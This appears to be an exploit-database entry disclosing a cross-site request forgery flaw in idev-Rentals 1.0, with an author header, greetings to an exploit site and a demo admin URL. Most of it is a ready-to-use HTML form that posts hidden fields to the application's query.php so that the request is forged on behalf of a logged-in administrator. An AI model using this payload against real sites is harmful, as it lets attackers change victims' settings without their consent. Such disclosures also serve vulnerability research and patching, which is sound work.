idev-Rentals version 1.0 suffers from a cross site request forgery vulnerability.
56c5848dcd1b1f9687da2b0e2dd27b71b2182f9975fc19f2cb72519566930f77
# Exploit Title: idev-Rentals 1.0 CSRF
# Author: Jonturk75
# Vendor or Software Link: http://idevspot.com/
# Category:: webapps
# Demo : http://idevspot.com/demos/idev-rentals/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
<form action="../library/query.php" method="post" name="form1" id="form1">
<input name="YOURNAME" class="hiddenarea100" value="yourname" type="hidden">
<input name="EMAIL" class="hiddenarea100" value="mail@mail.com" type="hidden">
<input name="SITENAMES" class="hiddenarea100" value="idev-Rentals" type="hidden">
<input name="AFFID" class="hiddenarea100" value="" type="hidden">
<select name="HELPBOX" size="1"><option> Show</option><option selected>Show</option><option>Hide</option></select>
<input name="Submit" value="Submit" type="submit">
</form>